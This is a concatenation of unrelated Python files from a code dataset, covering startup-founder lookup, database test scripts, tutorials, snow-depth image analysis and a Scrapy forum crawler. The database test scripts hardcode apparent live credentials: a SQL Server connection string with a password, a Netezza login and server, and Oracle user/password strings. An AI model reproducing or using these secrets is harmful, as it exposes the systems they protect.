    #       f"{most_invested_companies.index[0]}, {most_invested_companies.index[1]}, "
    #       f"{most_invested_companies.index[2]}")
# Sentiment analysis founder
def tw_analysis_founder(public_tweets, founder):
    """Print the overall TextBlob polarity (Positive/Negative/Neutral) of the
    given tweets about `founder`."""
    total_polarity = sum(TextBlob(tweet.text).sentiment[0] for tweet in public_tweets)
    if total_polarity > 0:
        sent = 'Positive'
    elif total_polarity < 0:
        sent = 'Negative'
    else:
        sent = 'Neutral'
    print(f"The sentiment about {founder} in Twitter is {sent}")
# Look for data about the founder
def founders(founder, people):
    """
    Look up `founder` ("First Last") in the `people` DataFrame and print the
    matching profile(s), a Twitter sentiment summary and any sketchy Google
    results.  Assumes a two-part name — TODO confirm single-word names
    cannot reach this function.
    """
    full_name = founder.split()
    public_tweets = api.search(founder)
    # What to search on Google
    look_for = founder
    for i in range(len(people)):
        # positional indexing throughout: the original mixed .iloc[i] with
        # label-based [i], which breaks when the index is not 0..n-1
        if people.first_name.iloc[i] == full_name[0] and people.last_name.iloc[i] == full_name[1]:
            display(Image(url=people.profile_image_url.iloc[i]))
            print(f'We found this information about {founder}:')
            print(f"Founder's name: {people.first_name.iloc[i]} {people.last_name.iloc[i]} ")
            print(f"Title: {people.title.iloc[i]}")
            print(f"Organization: {people.organization.iloc[i]}")
            print(f"Location: {people.location_city.iloc[i]}, {people.location_region.iloc[i]}, {people.location_country_code.iloc[i]}")
            # BUG FIX: `!= None` is True for NaN values, so missing URLs
            # were printed as "nan"; pd.notna skips them properly.
            if pd.notna(people.twitter_url.iloc[i]):
                print(f"Twitter URL: {people.twitter_url.iloc[i]}")
            if pd.notna(people.linkedin_url.iloc[i]):
                print(f"Linkedin URL: {people.linkedin_url.iloc[i]}")
            if pd.notna(people.facebook_url.iloc[i]):
                print(f"Facebook URL: {people.facebook_url.iloc[i]}")
    # Twitter analysis
    tw_analysis_founder(public_tweets, founder)
    # Google search
    most_warnings(find_webs(founder), look_for)
# Look for data about company
def find_companies_by_size(size, companies, name, sector, company):
    """
    Return one random open company of the given funding-size bucket
    ('small', 'medium' or 'big' — qcut quartiles of total funding) in
    `sector`, restricted to `company`'s country when `name` is a known
    company.  Result is a one-row DataFrame (random: .sample()).
    """
    company_nan = companies.dropna()
    company_sector = company_nan[company_nan['category_list'].str.contains(sector)].drop('index', axis=1).dropna()
    company_sector['total_funding_size'] = pd.qcut(company_sector.funding_total_usd, q=[0, .25, .75, 1], labels=['small', 'medium', 'big'])
    base = ((company_sector['total_funding_size'] == size)
            & (company_sector['funding_total_usd'] > 100000)
            & (company_sector['status'] != 'closed'))
    # BUG FIX: `name in company_nan['name']` tested membership in the Series
    # *index* (labels), not the values, so the country filter never applied.
    if name in company_nan['name'].values:
        return company_sector[base & (company_sector['country_code'] == company.country_code)].sample()
    return company_sector[base].sample()
def competitor_info(company):
    """Print a one-row company DataFrame as a human-readable profile."""
    money = format(company.funding_total_usd.item(), ',.2f')
    lines = [
        "Company name: {}".format(company.name.item()),
        "Total money raised: ${}".format(money),
        "Total rounds: {}".format(company.funding_rounds.item()),
        "Webpage: {}".format(company.homepage_url.item()),
        "Country: {}".format(company.country_code.item()),
        "Status: {}".format(company.status.item()),
        "Founded in: {}".format(company.founded_at.item()),
    ]
    print("\n".join(lines))
# Sentiment analysis company
def tw_analysis_company(public_tweets, company):
    """Print the overall TextBlob polarity (Positive/Negative/Neutral) of the
    given tweets about `company`."""
    total_polarity = sum(TextBlob(tweet.text).sentiment[0] for tweet in public_tweets)
    if total_polarity > 0:
        sent = 'Positive'
    elif total_polarity < 0:
        sent = 'Negative'
    else:
        sent = 'Neutral'
    print(f"The sentiment about {company} in Twitter is {sent}")
def startup(name, companies, sector):
    """Print a full report for the start-up `name` in `sector`.

    Prints the company's Crunchbase data and three competitors (small,
    medium, big funding buckets), then runs Twitter sentiment analysis and a
    Google warning scan regardless of whether the company was found.
    """
    company = companies[companies['name'] == name]
    # What to search on Google
    look_for = name
    # Gather tweets
    public_tweets = api.search(name)
    try:
        print(f"Company name: {company.name.item()}")
        print(f"Total money raised: ${format(company.funding_total_usd.item(),',.2f')}")
        print(f"Total rounds: {company.funding_rounds.item()}")
        print(f"Webpage: {company.homepage_url.item()}")
        print(f"Country: {company.country_code.item()}")
        print(f"Status: {company.status.item()}")
        # Find competitors
        print('\n')
        print(f"Competitors similar to {company.name.item()}:")
        print('\n')
        competitor_info(find_companies_by_size('small', companies, name, sector, company))
        print('\n')
        competitor_info(find_companies_by_size('medium', companies, name, sector, company))
        print('\n')
        competitor_info(find_companies_by_size('big', companies, name, sector, company))
    # FIX: narrowed the bare `except:` so KeyboardInterrupt/SystemExit still
    # propagate; `.item()` raises when the company is missing or duplicated.
    except Exception:
        print(f"We couldn't find information about {name} in Crunchbase")
    #Twitter sentiment analysis for company
    tw_analysis_company(public_tweets, name)
    # Google search
    most_warnings(find_webs(name), look_for)
|
7,942 | c3970ad8bddb1ca136724f589ff9088024157662 |
import logging
from common.loghdl import getLogHandler
from datastore.dbutil import DBSQLLite, getDSConnStr
#from utils.generator import random_password
#from datastore.dbadmin import DBAdmin
#from datastore.initevaldb import *
############################ TESTING TO BE REMOVED
# md = cfg
#def test_spetest(cfg):
# rs = cfg.runQry(selSpeTestRegLkupQry,1) #OT
# rsLen = len(rs)
# d = {}
# if rsLen > 0 :
# rl = list(x[0] for x in rs)
# #mdie.speTestRegLkup.append(rl)
# print "RL is ",rl
# for r in rl: d[r] = cfg.runQry(selSpeTestLkupQry,r)
# print "dict is %s " % d
# print "keys are ", d.keys()
#
# else : print("No Special Test Available")
def test_sel_qry(qry,dsn):
    """Run a SELECT against the SQLite datasource and print every row.

    qry -- SQL text to execute
    dsn -- SQLite datasource handed to getDSConnStr
    Side effects: opens and closes a DB connection, prints each result row.
    """
    print "QUERY IS %s " % qry
    #log = Logger('C:\ptest\all\env\logs','C:\ptest')
    log = logging.getLogger(__name__)
    #cfg = DBOracle('infadev/infadev@infadev',log)
    # NOTE(review): 'ib.user' / 'ib.pwd' are literal strings here, not
    # attribute lookups -- confirm getDSConnStr expects config key names.
    cs = getDSConnStr('SQLLITE', 'ib.user', 'ib.pwd', dsn)
    cfg = DBSQLLite(cs,log)
    ret = cfg.connToDB()
    print "Connecting to DB : ret = %s " % ret
    rs = cfg.runQry(qry)
    for r in rs:
        print "r = ", r
    # D = {}
    #print "rs = ", rs
    # for (v,k) in rs: D[string.capitalize(k)]=v
    # print D
    # id = list(x[0] for x in rs)
    # print "id = ", id
    # sn = list(x[1] for x in rs)
    # print "sn = ", sn
    cfg.closeDBConn()
def test_updSQLITE_qry():
qrys = """
UPDATE SERVER_CRED
SET STATUS = ?
WHERE ID = ?
AND UNAME = ?
"""
qry = """ UPDATE SERVER_CRED
SET STATUS = :STATUS
WHERE ID = :ID
AND UNAME = :UNAME """
db = "C:\\users\\eocampo\\workspace\\rydinfap\\src\\databases\\rydinfa.dbf"
print " db is %s " % db
print "QUERY IS %s " % qry
#log = Logger('C:\ptest\all\env\logs','C:\ptest')
log = logging.getLogger(__name__)
cfg = DBSQLLite(db,log)
ret = cfg.connToDB()
print "Connecting to DB : ret = %s " % ret
val = ['5', '1', 'infa']
rs = cfg.exeQry(qry,val)
print "rs = %s " % rs
cfg.closeDBConn()
def testMSrep():
    """Query tblSQLProcessStatus on a SQL Server for unacknowledged failures.

    NOTE(review): this function is broken as written -- `Logger` is only
    available via a commented-out import, and `cfg` is the empty string
    (the DBPYODBC construction is commented out), so `cfg.connToDB()`
    raises AttributeError. Kept for reference; repair before use.
    """
    # Unused hard-coded variant of the query below.
    qry1 = """ select TASK
    ,ID
    ,Server
    ,Job_Name
    ,Severity
    ,Ack
    from tblSQLProcessStatus
    where ACK = 'N'
    AND Server = 'INF'
    AND TASK like '%FAILED%' """
    # Parameterised via %-formatting; '%%%s%%' renders as %FAILED% for LIKE.
    qry = """ select TASK
    ,ID
    ,Server
    ,Job_Name
    ,Severity
    ,Ack
    from tblSQLProcessStatus
    where ACK = '%s'
    AND Server = '%s'
    AND TASK like '%%%s%%'
    """ % ('N','M3','FAILED')
    # cnxn = pyodbc.connect()
    db = 'DRIVER={SQL Server};SERVER=maintserver3,1433;DATABASE=RepairHistory;UID=edwuser;;PWD=WiWLiC'
    print " db is %s " % db
    print "QUERY IS %s " % qry
    log = Logger('C:\ptest\all\env\logs','C:\ptest')
    cfg = ''
    # cfg = DBPYODBC(db,log)
    ret = cfg.connToDB()
    print "Connecting to DB : ret = %s " % ret
    val = ['5', '1', 'infa']
    rs = cfg.runQry(qry)
    for r in rs:
        print r
    print "rs = %s " % rs
    cfg.closeDBConn()
def _getNZDS(sql,ib,log):
    """Run `sql` against the Netezza ODBC datasource described by `ib`.

    ib -- object carrying user/pwd/dbserver/db attributes
    Returns the result set, or [] when the connection attempt fails.
    """
    r = []
    print ('qry = %s' % sql)
    cs = getDSConnStr('NZODBC', ib.user, ib.pwd, ib.dbserver, ib.db)
    # NOTE(review): NZODBC is not imported in this module's visible header --
    # confirm the missing import.
    dbh = NZODBC(cs, log)
    if dbh.connToDB() != 0 : return r
    r = dbh.runQry(sql)
    dbh.closeDBConn()
    return r
# Empty Container
class InfaBaseAppBean:
    """Plain attribute bag: callers attach user/pwd/dbserver/db ad hoc."""
    pass
def test_wday(log):
    """Fetch the work-day row via _getNZDS and return its fourth column.

    Returns -1 when the query does not yield exactly one row, -4 when that
    row does not have exactly four columns.
    """
    # NOTE(review): this binds the class itself, so the attributes below are
    # shared class attributes, not instance state.
    ib = InfaBaseAppBean
    ib.user ='edwetl' ;ib.pwd='prodetl1203' ; ib.dbserver='rsnetezzap03' ; ib.db ='edw'
    # NOTE(review): `ds` is not imported anywhere in this module -- this line
    # raises NameError as written; confirm the intended module.
    sql = ds.workDay
    #sql =" SELECT Mon, Yr, Date_Day, Work_Day FROM EDW_WORK_DAY WHERE Date_Day =TO_DATE('19000101','yyyymmdd' )"
    rs = _getNZDS(sql,ib,log)
    if len(rs) != 1 : return -1
    if len(rs[0]) != 4 : return -4
    # FIX: was `rs[0][03]` -- a Python 2 octal literal (== 3) and a syntax
    # error under Python 3; write the index as a plain 3.
    return rs[0][3]
def main():
    """Ad-hoc driver; everything except the test_sel_qry call is commented out.

    NOTE(review): test_sel_qry requires (qry, dsn) -- calling it with no
    arguments raises TypeError; supply the intended query and datasource.
    """
    test_sel_qry()
    #log.setLogLevel("DEBUG")
    #cfg = DBSQLLite('C:\\mytest\\data\\evalgen.dbf',log)
    #cfg = DBSQLLite("C:\\eclipse\\workspace\\python\\test\\src\\data\\evalgen.dbf",log)
    #ret = cfg.connToDB()
    #cfg.closeDBConn()
# def test_crypt():
# enc = encrypt("welcome",'sscinfa2006')
# print "enc %s" % enc
#def test_ins():
#
# qry = DBMain.insServCredQry
# qry = """ INSERT INTO SERVER_CRED(
# SERV_ID,
# UNAME,
# PWD,
# DESCR
# )
# VALUES(
# :SERV_ID,
# :UNAME,
# :PWD,
# :DESCR
# ) """
# #dic = { 'SERV_ID':1, 'UNAME':'NAME','PWD':'PASWWORD','DESCR':'DESCR'}
# enc = encrypt("HELLO WORLD",'EOR')
# bindVar = ('SERV_ID','UNAME','PWD','DESCR')
# val = (3,'NAME',enc,'DESCR')
# dic =dict(zip( bindVar,val))
#
# print "START TEST_INS QRy = %s " % qry
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# lst = [1,'USER','PWD','THIS IS THE DESCR',]
# #ret = cfg.runQry(qry,lst)
# ret = cfg.exeQry(qry,dic)
# print " Query returned ", ret
# cfg.closeDBConn()
#
#
#def test_upd():
# qry = DBMain.updCredQry % 'SERVER_CRED'
# print "Qry is %s " % qry
# bindVar = ('ID','UNAME','PWD','DESCR')
# val = (3,'NAME','PWD','DESCR3')
# dic =dict(zip( bindVar,val))
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.exeQry(qry,dic)
# print " Query returned ", ret
# cfg.closeDBConn()
#
#
#def test_ins_frfile():
#
# qry = DBMain.insCredQry % 'SERVER_CRED'
#
# #dic = { 'SERV_ID':1, 'UNAME':'NAME','PWD':'PASWWORD','DESCR':'DESCR'}
# enc = encrypt("HELLO WORLD",'EOR')
# bindVar = ('SERV_ID','UNAME','PWD','DESCR')
# val = (3,'NAME',enc,'DESCR')
# dic =dict(zip( bindVar,val))
#
# print "START TEST_INS QRy = %s " % qry
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# lst = [1,'USER','PWD','THIS IS THE DESCR',]
# #ret = cfg.runQry(qry,lst)
# ret = cfg.exeQry(qry,dic)
# print " Query returned ", ret
# cfg.closeDBConn()
#
#
#
#
#def _printLst(lst):
#
# if(len(lst) > 0):
# for r in lst:
# print "Records ", r
# print "r2 = %s, decrypt = %s " % ( r[2],decrypt(r[2],'EOR'))
#
#
#def test_sel():
#
# qry = "SELECT SERV_ID, UNAME, PWD, DESCR FROM SERVER_CRED"
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.runQry(qry)
# print " Query returned ", ret
# _printLst(ret)
# cfg.closeDBConn()
#
#def test_new(prod_id):
# qry = """SELECT e.name,
# e.BU,
# s.name,
# s.alias,
# s.os,
# s.ver,
# s.patch,
# e.license ,
# e.ver ,
# e.patch ,
# e.build ,
# e.inst_path
#FROM environment e, server s
#WHERE e.prod_id = %s
#AND e.serv_id = s.id
#order by BU, e.name"""
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBSQLLite('C:\infaapp\soft_inv.sqlite',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.runQry(qry % prod_id)
# print " Query returned ", ret
# cfg.closeDBConn()
#
# return 0
#
#def get_pwd():
# qry = 'select NAME,OS from server'
# pwd_qry(qry)
#
#
#def uptime():
# qry = DBAdmin.selDomQry
# log = Logger('C:\ptest\all\env\logs','C:\ptest')
# cfg = DBOracle('tdbu03/tdbu03@IMMDWD',log)
# ret = cfg.connToDB()
# print "Connecting to DB : ret = %s " % ret
# ret = cfg.runQry(qry)
# print " Query returned ", ret
# cfg.closeDBConn()
# Entry point: all real work is commented out; only the rc bookkeeping runs.
if __name__ == '__main__':
    #testMSrep()
    #rc = main()
    rc = 0
    #test_crypt()
    print "RC = ", rc
    #test_new(3)
    #test_qry(3)
    #test_ins()
    #test_upd()
    #test_sel() # selSubjArea selInfSchedQry)
    #test_sel_qry(DBInfaRepo.selRepWfl)
    #test_updSQLITE_qry()
    #get_pwd()
    #uptime()
|
7,943 | 17326597d0597d16717c87c9bdf8733fb3acb77b | #! /usr/bin/python
import glo
print glo.x
# Rebinding `a` points it at a new string object, so id() changes.
a = "hello world"
print id(a)
a = "ni hao"
print id(a)
# range with a step of 2: prints 0, 2, 4.
for y in range(0, 5, 2):
    print y
# A bare tuple in a for statement iterates its elements.
for y in 1, 2, 3:
    print y
if (glo.x == 2):
    print("a==2")
else:
    print("a!=2")
# tuple: immutable; list: mutable; dict: key/value mapping.
tuple_name = ("name", "age", "school") #can't modify, only-read
list_name = ["boy", "girl"] #can modify
dict_name = {"a":"hello", "b":"world"}
def fun_hello(a=0, b=1):
    """Print a greeting, then each of the two (defaulted) arguments."""
    for line in ("hello everybody", a, b):
        print(line)

fun_hello()
class MyClass:
    """Toy class with one shared class attribute and a printing method."""

    # Shared default; assigning on an instance shadows it for that instance.
    common = 5

    def fun_sum(self, m, n):
        """Print the sum of m and n."""
        total = m + n
        print(total)
mySum = MyClass()
mySum.fun_sum(11, 22)
mySum001 = MyClass()
# Both instances read the shared class attribute: prints 5 twice.
print(mySum.common)
print(mySum001.common)
# Rebinding on the class is seen by all instances: prints 1000 twice.
MyClass.common = 1000
print(mySum.common)
print(mySum001.common)
# Assigning on one instance creates a shadowing instance attribute:
# prints 9999 then 1000.
mySum.common = 9999
print(mySum.common)
print(mySum001.common)
class Student(MyClass):
    """MyClass specialisation that can additionally report an age."""

    def fun_age(self, d):
        """Print the supplied age value."""
        print(d)
stu = Student()
stu.fun_age(100)
# fun_sum is inherited from MyClass.
stu.fun_sum(100, 200)
# NOTE(review): `file()` is a Python 2 builtin (removed in Python 3).
f = file("sayHello.txt", "w")
f.write("hello girls")
f.close()
section = "hello boys"
print(section[2:6]) # "llo " (indices 2 through 5)
|
7,944 | 8502ebdb13c68a9a56a1a4ba51370d8458ca81dc | #!/usr/bin/python
# -*- coding:utf-8 -*-
import importlib
def import_string(path):
    """Import and return the object named by a dotted path string.

    :param path: e.g. 'src.engine.agent.AgentHandler'
    :return: the attribute named by the last path segment
    """
    module_name, _, attr_name = path.rpartition('.')
    module = importlib.import_module(module_name)
    return getattr(module, attr_name)
7,945 | 24a538dcc885b37eb0147a1ee089189f11b20f8a | # import necessary modules
import cv2
import xlsxwriter
import statistics
from matplotlib import pyplot as plt
import math
import tqdm
import numpy as np
import datetime
def getDepths(imgs, img_names, intersectionCoords, stakeValidity, templateIntersections,
    upperBorder, tensors, actualTensors, intersectionDist, blobDistTemplate, debug, debug_directory,
    image_dates, imageSummary):
    """
    Function to calculate the change in snow depth for each stake using the tensor
    from the specified template

    Keyword arguments:
    imgs -- list of input images
    img_names -- list of corresponding image file names
    intersectionCoords -- list containing intersection coordinates for input images
    stakeValidity -- list indicating which stakes in input images are valid
    templateIntersections -- list containing intersection coordinates for template
    upperBorder -- upper crop parameter
    tensors -- tensors from template image
    actualTensors -- tensors calculated for input images
    intersectionDist -- list containing distances from blobs to intersection points
        for input images
    blobDistTemplate -- list containing blob to intersection point distances from
        template
    debug -- bool flag indicating whether output images should be saved
    debug_directory -- directory where output images should be written
    image_dates -- list containing dates of images extracted from EXIF data
    imageSummary -- dictionary containing information about each run

    Returns:
    (depths, imageSummary) -- per-image lists of depth changes (False marks a
        missing measurement) and the updated summary dictionary
    """
    # NOTE: False is the sentinel for "no measurement" throughout. It is
    # tested with `is`, never `==`/`!=`, because 0.0 == False and 1.0 == True
    # in Python -- the old equality tests silently dropped legitimate 0.0
    # depths and replaced tensor values of exactly 1.0 with template tensors.
    # list containing median depths for each image
    median_depths = list()
    median_depths_est = list()
    # create output dictionary for images
    depths = dict()
    # create excel workbook and add worksheet
    dest = str(debug_directory) + 'snow-depths.xlsx'
    workbook = xlsxwriter.Workbook(dest)
    worksheet = workbook.add_worksheet()
    worksheet.set_column(0, len(tensors) + 3, 25)
    # create format
    cell_format = workbook.add_format()
    cell_format.set_align('center')
    # add titles
    worksheet.write(0, 0, "Image", cell_format)
    worksheet.write(0, 1, "Date", cell_format)
    worksheet.write(0, len(tensors) + 2, "Median Depth (mm)", cell_format)
    worksheet.write(0, len(tensors) + 3, "Median Estimate (mm)", cell_format)
    for i, j in enumerate(tensors):
        worksheet.write(0, i+2, ("Stake %s" % str(i)), cell_format)
    # start from the first cell
    row = 1
    col = 0
    # image iterator
    iterator = 0
    # iterate through images
    for img_ in tqdm.tqdm(imgs):
        # create an image to overlay points on if debugging
        if(debug):
            img_overlay = img_.copy()
        # list to hold calculated depths
        depths_stake = list()
        estimate_stake = list()
        # get image name
        img_name = img_names[iterator]
        # reset column
        col = 0
        # write to excel file
        worksheet.write(row, col, img_name, cell_format)
        if isinstance(image_dates[iterator], datetime.datetime):
            worksheet.write(row, col + 1, image_dates[iterator].strftime('%x %X'), cell_format)
        col = 2
        # get intersection coordiantes
        coords_stake = intersectionCoords[img_name]
        # get blob intersection distances
        intersection_dist_stake = intersectionDist[img_name]
        # iterate through stakes in image
        for i, stake in enumerate(coords_stake):
            # if stake is valid and intersection point was found
            # (identity check: a y-coordinate of 0.0 is not the sentinel)
            if stakeValidity[img_name][i] and stake["average"][1] is not False:
                # add reference circles to output image if debugging
                # shows intersection point of image with reference to template
                if(debug):
                    cv2.circle(img_overlay, (int(templateIntersections[i][0]), int(templateIntersections[i][1]) - upperBorder), 5, (255,0,0), 3)
                    cv2.circle(img_overlay, (int(stake["average"][0]), int(stake["average"][1])), 5, (0,255,0), 2)
                # calculate change in snow depth in mm
                # (identity check: a tensor value of exactly 1.0 must not be
                # mistaken for the True placeholder)
                tensor = actualTensors[img_name][i] if actualTensors[img_name][i] is not True else tensors[i]
                depth_change = ((templateIntersections[i][1] - upperBorder) - stake["average"][1]) * tensor
                # calculate change in snow depth using blob distances
                distances_stake = list()
                for w, x in enumerate(intersection_dist_stake[i]):
                    if x is not False:
                        distances_stake.append((abs(blobDistTemplate[i][w]) - abs(x)) * tensor)
                distance_estimate = statistics.median(distances_stake) if len(distances_stake) > 0 else 0
                # write to excel file
                worksheet.write(row, col + i, "%.2f (%.2f)" % (depth_change, distance_estimate), cell_format)
                # add to list
                depths_stake.append(depth_change)
                estimate_stake.append(distance_estimate)
            # if stake wasn't valid or intersection point not found
            else:
                # if stake was valid
                if stakeValidity[img_name][i]:
                    worksheet.write(row, col + i, "Not Found", cell_format)
                # invalid stake
                else:
                    worksheet.write(row, col + i, "Invalid Stake", cell_format)
                # append false to array
                depths_stake.append(False)
                estimate_stake.append(False)
        # output debug image
        if(debug):
            cv2.imwrite(debug_directory + img_name, img_overlay)
        # add list to dictionary
        depths[img_name] = depths_stake
        # determine median depth (keep legitimate 0.0 measurements)
        valid_depths = [x for x in depths_stake if x is not False]
        valid_estimates = [x for x in estimate_stake if x is not False]
        if(len(valid_depths) > 0):
            median = statistics.median(valid_depths)
            median_est = statistics.median(valid_estimates)
        else:
            median = False
            median_est = False
        # add to median depth list
        median_depths.append(median)
        median_depths_est.append(median_est)
        # write median to excel file (a median of exactly 0 now reports 0.0
        # instead of falling through to "n/a")
        if median is not False and median > 0:
            worksheet.write(row, len(tensors) + 2, "%.2f" % median, cell_format)
            worksheet.write(row, len(tensors) + 3, "%.2f" % median_est, cell_format)
        elif median is not False:
            worksheet.write(row, len(tensors) + 2, "0.0", cell_format)
            worksheet.write(row, len(tensors) + 3, "0.0", cell_format)
        else:
            worksheet.write(row, len(tensors) + 2, "n/a", cell_format)
            worksheet.write(row, len(tensors) + 3, "n/a", cell_format)
        # increment row
        row += 1
        # increment iterator
        iterator += 1
        # update image summary
        imageSummary[img_name][" "] = ""
        imageSummary[img_name]["Stake (Depth Calculation)"] = "Depth (mm) Estimate (mm)"
        for e, depth in enumerate(depths_stake):
            if isinstance(depth, float):
                imageSummary[img_name][" %d " % (e+1)] = "%0.2f %0.2f " % \
                    (depth, estimate_stake[e])
            else:
                imageSummary[img_name][" %d " % (e+1)] = "%s %s " % \
                    ("n/a", "n/a")
    # close workbook
    workbook.close()
    # drop images with no valid median (sentinel False), then clamp negatives
    filterSet = zip(median_depths, median_depths_est, image_dates)
    filterSet = [(x, y, z) for x, y, z in filterSet if x is not False]
    # FIX: guard against an empty result -- zip(*[]) raised ValueError before
    if filterSet:
        median_depths, median_depths_est, image_dates = zip(*filterSet)
        median_depths = np.asarray(median_depths).clip(0)
        median_depths_est = np.asarray(median_depths_est).clip(0)
        # generate plot
        fig,ax = plt.subplots(1)
        plt.plot(image_dates, median_depths)
        plt.plot(image_dates, median_depths_est)
        plt.gcf().autofmt_xdate()
        plt.legend(['Median Depth', 'Median Estimate'], loc='upper left')
        ax.set_xlabel("Date")
        ax.set_ylabel("Snow Depth (mm)")
        plt.xticks(rotation=75)
        plt.tight_layout()
        # save figure
        plt.savefig(debug_directory + "depth-graph.jpg")
        plt.close()
    # return dictionary containing snow depth changes
    return depths, imageSummary
|
7,946 | c355be4e05d1df7f5d6f2e32bbb5a8086babe95b | #5.8-5.9
# Exercise 5.8-5.9: greet each user; admins get a status-report prompt,
# and an empty user list gets a recruiting message.
users = ['user1', 'user2', 'user3', 'user4', 'admin']
#users = []
if users:
    for user in users:
        if user == 'admin':
            print(f"Hello, {user}, would you like to see a status report?")
        else:
            print(f"Hello, {user}, thank you for logging in again")
else:
    # FIX: typo in the user-facing message ("ind" -> "find")
    print("We need to find some users!")
#5.10
# Exercise 5.10: case-insensitive availability check for requested usernames.
current_users = ['name1', 'name2', 'name3', 'name4', 'name5']
new_users = ['naMe5', 'name6', 'name7', 'name8', 'name9', 'Name1']
for candidate in new_users:
    shown = candidate.title()
    if candidate.lower() in current_users:
        print(f"Sorry, this name - {shown} is used. Try again with another name.")
    else:
        print(f"You can use this name - {shown}.")
#5.11
# Exercise 5.11: print the ordinal form of 1..9.
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# Irregular English ordinals; everything else takes the "th" suffix.
_irregular = {1: "1st", 2: "2nd", 3: "3rd"}
for value in numbers:
    print(_irregular.get(value, f"{value}th"))
7,947 | ececcf40005054e26e21152bcb5e68a1bce33e88 | ' a test module '
__author__ = 'Aaron Jiang'
import sys
def test():
    """Greet according to how many command-line arguments were supplied."""
    argc = len(sys.argv)
    if argc == 1:
        print('Hello World')
    elif argc == 2:
        print('Hello, %s!' % sys.argv[1])
    else:
        print('TOO MANY ARGUMENTS!')
# Run the demo only when executed as a script, not when imported.
if __name__ == '__main__':
    test()
class Test():
    # Class attribute shared by all instances; bumped once per construction.
    count = 0
    # NOTE: this runs once, at class-definition time (prints 'called  0').
    print('called ', count)

    def __init__(self, name):
        """Store the (name-mangled) name and increment the shared counter."""
        self.__name = name
        Test.count += 1
# After one construction Test.count == 1, so this prints 1.
t1 = Test('Aaron')
print(t1.count)
# Rebind the class attribute; the next __init__ increments it to 11.
Test.count = 10
t2 = Test('Aaron2')
print(t2.count)
class Screen:
    """Screen dimensions exposed through properties.

    `width` and `height` must be assigned before being read (or before
    reading `resolution`); the backing attributes are created lazily by the
    setters.
    """

    @property
    def width(self):
        """Screen width (units are whatever the caller assigns)."""
        return self._width

    @width.setter
    def width(self, width):
        self._width = width

    @property
    def height(self):
        """Screen height."""
        # CONSISTENCY FIX: the backing attribute is now `_height`, matching
        # `_width`; the original used the name-mangled `__height` for this
        # one attribute only.
        return self._height

    @height.setter
    def height(self, height):
        self._height = height

    @property
    def resolution(self):
        """Read-only product of width and height."""
        return self._width * self._height
sc = Screen()
sc.width = 1024
sc.height = 1
# Prints width * height (1024).
print(sc.resolution)
class Chain(object):
    """Build a URL-style path by chaining attribute accesses.

    Every attribute lookup returns a *new* Chain with '/<name>' appended;
    str() (and repr()) yield the accumulated path.
    """

    def __init__(self, path=''):
        self._path = path

    def __getattr__(self, path):
        return Chain('{}/{}'.format(self._path, path))

    def __str__(self):
        return self._path

    __repr__ = __str__

print(Chain('/nan').status.user.timeline.list)
|
7,948 | f1eaba91e27dc063f3decd7b6a4fe4e40f7ed721 | #! /usr/bin python3
# -*- coding: utf-8 -*-
from scrapy import Request
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.spiders import CrawlSpider
from scrapy.spiders import Rule
from xici_bbs.spiders.author import get_author_item
from xici_bbs.spiders.comment import get_comment_list, get_comment_next_page
from xici_bbs.spiders.post import get_post_item
class XiciSpider(CrawlSpider):
    """Crawl xici.net, yielding author items, post items and their comments.

    Link extraction is split three ways: post pages (/d<id>.htm), author
    pages (/u<id>), and a generic follow rule; account.xici.net is always
    excluded.
    """
    name = 'xici'
    start_urls = ['http://www.xici.net']
    # Post detail pages.
    post_extract = LxmlLinkExtractor(
        allow=(
            '/d\d+.htm',
        ),
        # NOTE(review): no trailing comma -- this is the plain string
        # 'xici.net', not a 1-tuple like the sibling extractors use.
        allow_domains=(
            'xici.net'
        ),
        # deny=(
        #
        # ),
        deny_domains=(
            'account.xici.net',
        )
    )
    # Author profile pages.
    author_extract = LxmlLinkExtractor(
        allow=(
            '/u\d+$',
            '/u\d+/$',
        ),
        allow_domains=(
            'xici.net',
        ),
        # deny=(
        #
        # ),
        deny_domains=(
            'account.xici.net',
        )
    )
    # Everything else on xici.net worth following (no callback).
    follow_extract = LxmlLinkExtractor(
        # allow=(
        #     '/s/[0-9]+',
        # ),
        allow_domains=(
            'xici.net',
        ),
        deny=(
            '/help/',
        ),
        deny_domains=(
            'account.xici.net',
            # 'life.xici.net',
        )
    )
    rules = (
        Rule(author_extract, follow=True, callback='parse_author'),
        Rule(post_extract, follow=True, callback='parse_post'),
        # Rule(follow_extract, follow=True, callback='parse_follow'),
        Rule(follow_extract, follow=True),
    )
    # a_count = 0
    # p_count = 0
    # f_count = 0

    def parse_author(self, response):
        """Yield one author item extracted from a profile page."""
        # self.a_count += 1
        # print('author: ', self.a_count, ' ', response.url)
        author_item = get_author_item(response)
        yield author_item

    def parse_post(self, response):
        """Build the post item, then delegate to parse_comment, which yields
        the comments and finally the post itself."""
        # self.p_count += 1
        # print('post: ', self.p_count, ' ', response.url)
        post_item = get_post_item(response)
        for item_or_request in self.parse_comment(response, post_item):
            yield item_or_request

    # def parse_follow(self, response):
    #     self.f_count += 1
    #     print('follow: ', self.f_count, ' ', response.url)

    def parse_comment(self, response, post_item=None):
        """Yield comment items for one page; follow pagination, carrying the
        post item via request meta, and yield the post on the last page."""
        if not post_item:
            post_item = response.meta['post_item']
        for comment_item in get_comment_list(response):
            post_item['comment_ids'].append(comment_item['comment_id'])
            yield comment_item
        comment_next_page = get_comment_next_page(response)
        if comment_next_page:
            yield Request(
                url=comment_next_page,
                callback=self.parse_comment,
                meta={
                    'post_item': post_item,
                }
            )
        else:
            yield post_item
|
7,949 | cd9cc656a62728b3649b00c03ca8d05106015007 | from rest_framework import serializers
